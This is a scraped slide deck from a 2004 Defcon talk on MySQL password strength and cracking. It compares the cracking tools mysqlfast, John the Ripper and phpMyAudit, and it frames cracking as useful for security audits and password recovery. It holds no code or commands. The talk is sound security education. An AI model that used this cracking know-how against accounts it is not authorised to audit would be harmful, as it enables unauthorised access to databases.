Download presentation
Presentation is loading. Please wait.
1
1 MySQL Passwords Password Strength and “Cracking” Presented by Devin Egan Defcon 12 - July 31, 2004 Password Strength and “Cracking” Presented by Devin Egan Defcon 12 - July 31, 2004
2
Defcon 12July 31, 20042 Introduction Who am I? Goals MySQL Password Education Introduce MySQL Password “Cracking” Who am I? Goals MySQL Password Education Introduce MySQL Password “Cracking”
3
Defcon 12July 31, 20043 What Will This Talk Cover? Covered MySQL Password “Cracking” NOT covered How to obtain a MySQL hash Covered MySQL Password “Cracking” NOT covered How to obtain a MySQL hash
4
Defcon 12July 31, 20044 Passwords: Best Practices Absolute Minimum of 9 Characters Mixed Case and Mixed Special Characters Absolute Minimum of 9 Characters Mixed Case and Mixed Special Characters
5
Defcon 12July 31, 20045 Why Crack MySQL Passwords? Security Audits Recovery of a lost password Security Audits Recovery of a lost password
6
Defcon 12July 31, 20046 Tools for Cracking Passwords Existing tools “mysqlfast” Very effective and fast Brute Force Cracker Limited: 8 characters max Works only on a hash for MySQL 4.0 or lower Single hash at a time Existing tools “mysqlfast” Very effective and fast Brute Force Cracker Limited: 8 characters max Works only on a hash for MySQL 4.0 or lower Single hash at a time
7
Defcon 12July 31, 20047 Tools for Cracking Passwords Existing tools “John The Ripper” (contrib) Dictionary-based Cracker Trusted by most security professionals Limited: Works only on a hash for MySQL 4.0 or lower Can be SLOW Existing tools “John The Ripper” (contrib) Dictionary-based Cracker Trusted by most security professionals Limited: Works only on a hash for MySQL 4.0 or lower Can be SLOW
8
Defcon 12July 31, 20048 Tools for Cracking Passwords New Tool “phpMyAudit” Dictionary-based Runs from the Web or a Shell Script Extremely fast (after dictionary import) Can find passwords that “mysqlfast” cannot brute force Limited: Not always as effective as “mysqlfast” or “John” New Tool “phpMyAudit” Dictionary-based Runs from the Web or a Shell Script Extremely fast (after dictionary import) Can find passwords that “mysqlfast” cannot brute force Limited: Not always as effective as “mysqlfast” or “John”
9
Defcon 12July 31, 20049 Demonstration!
10
Defcon 12July 31, 200410 Conclusion Questions? For updates, please check: http://www.php5security.com/projects/phpMyAudit Questions? For updates, please check: http://www.php5security.com/projects/phpMyAudit
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.